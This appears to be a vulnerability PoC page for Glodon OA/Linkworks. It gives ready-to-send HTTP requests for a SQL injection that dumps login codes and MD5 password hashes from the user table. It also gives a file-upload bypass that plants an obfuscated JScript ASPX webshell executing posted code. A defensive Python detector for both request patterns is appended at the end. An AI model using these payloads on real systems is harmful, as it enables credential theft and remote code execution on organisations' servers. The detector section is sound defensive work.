Glodon (广联达)

Contents

Glodon OA user table

T_ORG_USER → F_CODE, F_PWD_MD5 (login code and MD5 password hash)

Glodon OA SQL injection vulnerability PoC (GetIMDictionary, `key` parameter)

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1

Host: xxx.com

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie:

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

Glodon OA authenticated (back-end) file upload vulnerability PoC

The Content-Disposition carries two `filename` attributes, `1.aspx` and then `1.jpg`, so that the extension check and the save routine can be made to read different names. The uploaded body is a JScript ASPX webshell: the index expression over FRWT spells the string "unsafe", so the page runs `eval(Request.Form("qmq1"), "unsafe")` on whatever is posted in the `qmq1` form field.

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1

Host: 10.10.10.1:8888

X-Requested-With: Ext.basex

Accept: text/html, application/xhtml+xml, image/jxr, */*

Accept-Language: zh-Hans-CN,zh-Hans;q=0.5

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

Accept: */*

Origin: http://10.10.10.1

Referer: 

Cookie:

Connection: close

Content-Length: 421

------WebKitFormBoundaryFfJZ4PlAZBixjELj

Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"

Content-Type: application/text

<%@ Page Language="Jscript" Debug=true%>

<%

var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';

var GFMA=Request.Form("qmq1");

var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);

eval(GFMA, ONOQ);

%>

------WebKitFormBoundaryFfJZ4PlAZBixjELj--

Glodon Linkworks GetIMDictionary SQL injection vulnerability (minimal request)

PoC:
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
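Both PoCs on this page (the GetIMDictionary `key` injection and the msgbroadcastuploadfile.aspx upload with a duplicated `filename` attribute) leave a recognisable shape in captured HTTP traffic. The following is an added example, not Glodon code and not from the original write-up: a small Python detector that parses a raw HTTP/1.1 request and flags either pattern. The detection regex, the list of executable extensions and the sample requests are constructed assumptions for illustration; the paths are the ones used by the PoCs above.

```python
"""Flag the two Glodon OA request patterns shown on this page.

Added example (not vendor code). Rules and sample requests are constructed.
"""
import os
import re
from urllib.parse import parse_qs

# Paths from the PoCs above; IIS paths are case-insensitive, so compare lowercased.
GETIMDICTIONARY_PATH = "/webservice/im/config/configservice.asmx/getimdictionary"
UPLOAD_PATH = "/gtp/im/services/group/msgbroadcastuploadfile.aspx"

# Assumed rule: a quote followed by a SQL keyword/comment, or UNION ... SELECT.
SQLI_RE = re.compile(r"(?i)'\s*(?:union|or|and|;|--|/\*)|\bunion\b.*?\bselect\b")
# Extensions ASP.NET/IIS executes instead of serving as static content (assumed list).
EXEC_EXTS = {".asp", ".aspx", ".ashx", ".asmx", ".ascx", ".cshtml", ".soap"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, lowercased path, headers and body."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:  # tolerate LF-only captures
        head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": target.split("?", 1)[0].lower(),
            "headers": headers, "body": body}


def check_getimdictionary_sqli(req):
    """Rule 1: injection through the `key` form field of GetIMDictionary."""
    if req["path"] != GETIMDICTIONARY_PATH:
        return []
    if "application/x-www-form-urlencoded" not in req["headers"].get("content-type", ""):
        return []
    fields = parse_qs(req["body"], keep_blank_values=True)
    return [{"rule": "sqli_getimdictionary", "detail": v}
            for v in fields.get("key", []) if SQLI_RE.search(v)]


def check_msgbroadcast_upload(req):
    """Rule 2: multipart upload to msgbroadcastuploadfile.aspx naming a server-side
    script, including the two-filename Content-Disposition used by the PoC."""
    if req["path"] != UPLOAD_PATH:
        return []
    m = re.search(r'boundary=("?)([^";]+)\1', req["headers"].get("content-type", ""))
    if not m:
        return []
    findings = []
    for part in req["body"].split("--" + m.group(2)):
        part = part.strip()
        if not part or part == "--":  # preamble / closing delimiter
            continue
        part_head = part.split("\r\n\r\n", 1)[0].split("\n\n", 1)[0]
        names = re.findall(r'filename="([^"]*)"', part_head, flags=re.I)
        bad = [n for n in names if os.path.splitext(n.lower())[1] in EXEC_EXTS]
        if bad:
            findings.append({"rule": "upload_msgbroadcast",
                             "detail": f"filenames={names} executable={bad}"})
    return findings


def analyze(raw):
    """Return all findings for one raw request (empty list means nothing flagged)."""
    req = parse_request(raw)
    return check_getimdictionary_sqli(req) + check_msgbroadcast_upload(req)


# Constructed sample requests mirroring the PoCs on this page (host is fictitious).
SQLI_REQUEST = "\r\n".join([
    "POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1",
    "Host: oa.example.test",
    "Content-Type: application/x-www-form-urlencoded",
    "",
    "dasdas=&key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --",
])
UPLOAD_REQUEST = "\r\n".join([
    "POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1",
    "Host: oa.example.test",
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj",
    "",
    "------WebKitFormBoundaryFfJZ4PlAZBixjELj",
    'Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"',
    "Content-Type: application/text",
    "",
    '<%@ Page Language="Jscript" %><% Response.Write("placeholder") %>',  # harmless stand-in
    "------WebKitFormBoundaryFfJZ4PlAZBixjELj--",
])
BENIGN_REQUEST = SQLI_REQUEST.rsplit("\r\n", 1)[0] + "\r\ndasdas=&key=1"

if __name__ == "__main__":
    for name, raw in [("sqli", SQLI_REQUEST), ("upload", UPLOAD_REQUEST), ("benign", BENIGN_REQUEST)]:
        print(name, analyze(raw))
```

The upload rule deliberately inspects every `filename` attribute in a part rather than the first or last one: the PoC's trick is that different code paths read different attributes, so a detector that picks one of them inherits the same blind spot.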